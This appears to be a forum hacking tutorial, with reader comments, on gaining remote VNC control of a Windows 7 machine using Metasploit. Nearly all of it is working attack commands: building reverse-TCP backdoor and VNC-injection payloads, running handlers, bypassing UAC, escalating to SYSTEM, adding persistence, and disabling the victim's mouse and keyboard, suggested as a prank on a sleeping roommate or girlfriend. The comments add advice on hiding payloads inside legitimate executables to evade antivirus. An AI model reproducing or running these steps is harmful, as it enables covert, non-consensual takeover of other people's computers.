How To: Run an VNC Server on Win7

Run an VNC Server on Win7

OTW's great Tutorial Hack Like a Pro: How to Save the World from Nuclear Annihilation gives me the inspiration to try this on Win7 sp1.

I did this under Bugtraq 2 Black Widow but it works almost similar on Kali-Linux.

Step 1: Start All Services Und Run Metasploit

On bugtraq not preinstalled so:

# sudo apt-get install vncviewer

Than start the required services:

# sudo service postgresql start
# sudo service metasploit start
# sudo msfconsole

Step 2: We Need Two Payloads

I did this with msfpayload:
First we need the meterpreter

msf > msfpayload windows/meterpreter/reversetcp LHOST=<your-ip> LPORT=<listening-port> x > /home/bugtraq/Desktop/backdoor.exe

Now we got the file backdoor.exe on our Desktop now we need another .exe file that we will upload to our target and execute with the meterpreter.

msf > msfpayload windows/vncinject/reversetcp LHOST=<your-ip>
LPORT=<lisening-port> x > /home/bugtraq/Desktop/gui.exe

Step 3: Lets Run the Meterpreter and Bypass the UAC

msf > use multi/handler

msf exploit(handler) > set payload windows/meterpreter/reversetcp
msf exploit(handler) > set LHOST <your-ip>
msf exploit(handler) > set LPORT <port>

msf exploit(handler) > exploit

So we see that the meterpreter is running on our target but we need more system rights.

meterpreter > getprivs
meterpreter > getsystem

Access Denied!!

Should not be a big problem
You can look you Privs with the command
meterpreter > run post/windows/gather/winprivs

meterpreter > background

msf exploit(handler) > use exploit/windows/local/bypassuac

msf exploit(bypassuac) > set payload windows/meterpreter/reversetcp
msf exploit(bypassuac) > set LHOST <your-ip>
msf exploit(bypassuac) > set LPORT <port>
msf exploit(bypassuac) > set session 1

msf exploit(bypassuac) > exploit

If that happens only try again
msf exploit (bypassuac) > exploit

works, now:

meterpreter > getsystem
meterpreter > getprivs

Now we should owned the system but we want to have an VNC on the target.
If you want to make the meterpreter persistence should something go wrong just type

meterpreter > run persistence –A –L c:\\ -X 5 –p <port> –r <your-ip>

Step 4: Now the Funny Part

the meterpreter got the download and upload function and the works like this
meterpreter > upload -r /home/bugtraq/Desktop/gui.exe C:/

Now we open a second metasploit terminal and type in

msf > use multi/handler
msf exploit(handler) > set payload windows/vncinject/reversetcp
msf exploit(handler) > set LHOST <your-ip>
msf exploit(handler) > set LPORT <port>
msf exploit(handler) > exploit

It should now look like this

Step 5: Getting Finished...

Now we go back to our meterpreter terminal, make sure you are in the folder C:/ where the gui.exe file is and type in
meterpreter > execute -f gui.exe

Step 6: MUCH More FUN

Lets say in front of our target pc sleeps a person(roomate/girlfriend/whatever), if you want to wake him/her in an anoying way search his musik and have some Fun hehe,

meterpreter > uictl disable mouse
meterpreter > uictl disable keyboard

and have fun :D

I am sure there are better ways to do this hack
but it works, suggestions for improvement are always welcome!

Hope you enjoyed

7 Comments

Thanks :)

What if there is some kind of antivirus installed on the target pc?

these are raw payloads (script kiddi like) for testing purpose only!

If you really want to do that in an realistic way you can turn on your AV and encode and embed the payloads in legitime exfiles to avoid detection. So better use MSFVENOM instead of MSFPAYLOAD because msfpayload seems inacurat and getting deletet from the Metasploit database in June or something.

Our teacher OTW got some nice tutorials to avoid AV detection but if you want i can do another Tutorial in an realistic way so with encoded payloads and turned on AV.

hi i have a question, I've seen many different ways where the attacker can gain access to the victims PC by running vnc on kali linux, but personally when i run vnc i can monitor victims screen but i couldn't control/take over his control of his PC. why is it so? is it because i didn't install something extra for it to work?

Good job. Just to note, when downloading/uploading using meterpreter, one has to use double slashes when specifying the directory. i.e download C:\\topsecret\\secret.txt //usr//share. And one question, after executing the bypass for uac, which session did you continue using? session 2 or 1? thanks

Thx for the note, in my case it works also without double slashes.

After executing the bypass for uac, metasploit opens a second session for that. So i continue working in session 2, session 1 can be closed.

Sorry for answering so late.

Share Your Thoughts

  • Hot
  • Latest